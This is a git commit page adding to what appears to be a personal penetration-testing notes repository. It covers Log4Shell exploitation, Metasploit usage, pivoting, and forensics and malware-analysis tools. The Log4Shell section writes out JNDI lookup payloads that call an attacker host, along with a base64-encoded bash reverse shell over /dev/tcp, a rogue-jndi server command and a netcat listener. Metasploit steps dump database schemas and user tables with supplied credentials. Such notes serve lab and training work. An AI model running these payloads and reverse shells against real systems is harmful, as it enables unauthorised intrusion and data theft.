whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

bump

This commit is contained in:
Stefan Etringer 2022-12-12 20:03:55 +01:00
parent 451631aefb
commit 806c652158
7 changed files with 90 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

32
Exploits/Java/Log4Shell.md
View File

@ -131,3 +131,35 @@ ${${::-j}ndi:rmi://attackerendpoint.com/}
SOLR_OPTS="$SOLR_OPTS -Dlog4j2.formatMsgNoLookups=true" SOLR_OPTS="$SOLR_OPTS -Dlog4j2.formatMsgNoLookups=true"
10.10.90.21210.10.90.212 10.10.90.21210.10.90.212
``` ```
## Tipps, Tricks & other Tools
* Use tcpdump to catch a possible connection
```sh
tcpdump -i <interface> port 389
```
* While the payload may look like this
```java
"${jndi:ldap://$ATTACKER_IP/check}"
```
### Use Veracode's Tools
* Clone [veracode's rogue-jndi](https://github.com/veracode-research/rogue-jndi) and build jar with maven
```sh
cd rogue-jndi
mvn package
```
* Prepare a reverse shell
```sh
echo 'bash -c bash -i >& /dev/tcp/$ATTACKER_IP/4711 0>&1' | base64
```
* Run the server
```sh
java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,<prepared_rev_shell>}|{base64,-d}|{bash,-i}" --hostname "$ATTACKER_IP"
```
* Select and use the payload from the displayed strings
* Catch the reverse shell with something like netcat
```sh
nc -lvnp 4711
```

12
Exploits/Web/WASM.md Normal file
View File

@ -0,0 +1,12 @@
# Web Assembly
## Debugger
Use live debuggin capabilities of [Cetus](https://github.com/Qwokka/Cetus.git). Install it through chrome://extensions. After the installation, Cetus is located in the dev tools as a tab
### Cetus Search function
* Search for modified values and get their address values
* Do a differential search -> search once without any value followed by a search where the operator (LT, NE, GT) is changed, still without a value in the search field.

8
Forensics/Android.md Normal file
View File

@ -0,0 +1,8 @@
# Android
## Android Backups
* Restore a backup by making a tar file out of it via
```sh
( printf "\x1f\x8b\x08\x00\x00\x00\x00\x00" ; tail -c +25 backup.ab ) | tar xfvz
```

9
Forensics/Malware.md Normal file
View File

@ -0,0 +1,9 @@
# Malware
## Tools
[Detect is Easy | DIE](https://github.com/horsicq/Detect-It-Easy)
* Analyze with `capa <binary>`
* Unpack with `upx`
* Re-analyze after deleting the cache `del <binary>.viv`

1
Forensics/Volatility.md
View File

@ -56,6 +56,7 @@ volatility -f <file.iso> windows.vadyarascan
* Dump memory map * Dump memory map
```sh ```sh
volatility -f <file.iso> windows.memmap.Memmap --pid <pid> --dump volatility -f <file.iso> windows.memmap.Memmap --pid <pid> --dump
volatility -f <file.iso> windows.dumpfiles --pid <pid>
``` ```
* Dump and scan files * Dump and scan files

22
Miscellaneous/Metasploit.md
View File

@ -12,6 +12,7 @@
* __Post__ postexploitation * __Post__ postexploitation
## Notes ## Notes
* Search via scope * Search via scope
```sh ```sh
search type:auxiliary <stuff> search type:auxiliary <stuff>
@ -26,10 +27,12 @@ run -z
* Flush via `unset all` * Flush via `unset all`
## Sessions ## Sessions
* `background` or `ctrl+z` * `background` or `ctrl+z`
* Foreground via `sessions -i <number>` * Foreground via `sessions -i <number>`
## Scanning ## Scanning
* Portscan * Portscan
```sh ```sh
search portscan search portscan
@ -41,6 +44,7 @@ search portscan
* HTTP version `scanner/http/http_version` * HTTP version `scanner/http/http_version`
## Database ## Database
* Start postgres * Start postgres
* `msfdb init` * `msfdb init`
* `db_status` * `db_status`
@ -50,11 +54,27 @@ search portscan
* Show `services` * Show `services`
* Set RHOST values via `hosts -R` * Set RHOST values via `hosts -R`
### Database Operations
* Dump schemas
```sh
use auxiliary/scanner/postgres_schemadump
run postgres://$DB_USER:$DB_PASS@172.10.0.42/postgres
```
* Select table
```sh
use auxiliary/admin/postgres/postgres_sql
run postgres://$DB_USER:$DB_PASS@172.10.0.42/postgres sql='select * from users'
```
## Exploits ## Exploits
* `show targets` * `show targets`
* `show payloads` * `show payloads`
## Reverse Shells ## Reverse Shells
* Multihandler, set options * Multihandler, set options
```sh ```sh
use exploit/multi/handler use exploit/multi/handler
@ -66,6 +86,7 @@ use multi/http/apache_mod_cgi_bash_env_exec
``` ```
## Post Exploitation ## Post Exploitation
* `load kiwi` * `load kiwi`
* `load python` * `load python`
* Windows * Windows
@ -82,6 +103,7 @@ use multi/http/apache_mod_cgi_bash_env_exec
* `use post/linux/gather/hashdump` * `use post/linux/gather/hashdump`
## Other Meterpreter stuff ## Other Meterpreter stuff
* Staged and in disguise running as another servicename * Staged and in disguise running as another servicename
``` ```
getpid getpid

6
Post Exploitation/Pivoting.md
View File

@ -197,6 +197,7 @@ portfwd add -l 22 -p 22 -r 127.0.0.1
run get_local_subnets run get_local_subnets
background background
route add 10.1.1.0 255.255.255.0 1 route add 10.1.1.0 255.255.255.0 1
route add 172.10.0.1/32 -1
route print route print
``` ```
* Or use `load auto_add_route` from [rapid7's documentation](https://www.rapid7.com/blog/post/2010/02/09/automatically-routing-through-new-subnets/) * Or use `load auto_add_route` from [rapid7's documentation](https://www.rapid7.com/blog/post/2010/02/09/automatically-routing-through-new-subnets/)
@ -219,6 +220,11 @@ run
use auxiliary/server/socks_proxy use auxiliary/server/socks_proxy
``` ```
* Set proxychain on attacker accordingly * Set proxychain on attacker accordingly
```sh
run srvhost=127.0.0.1 srvport=9050 version=4a
curl --proxy socks4a:localhost:9050
proxychains -q nmap 10.10.47.11
```
### rpivot ### rpivot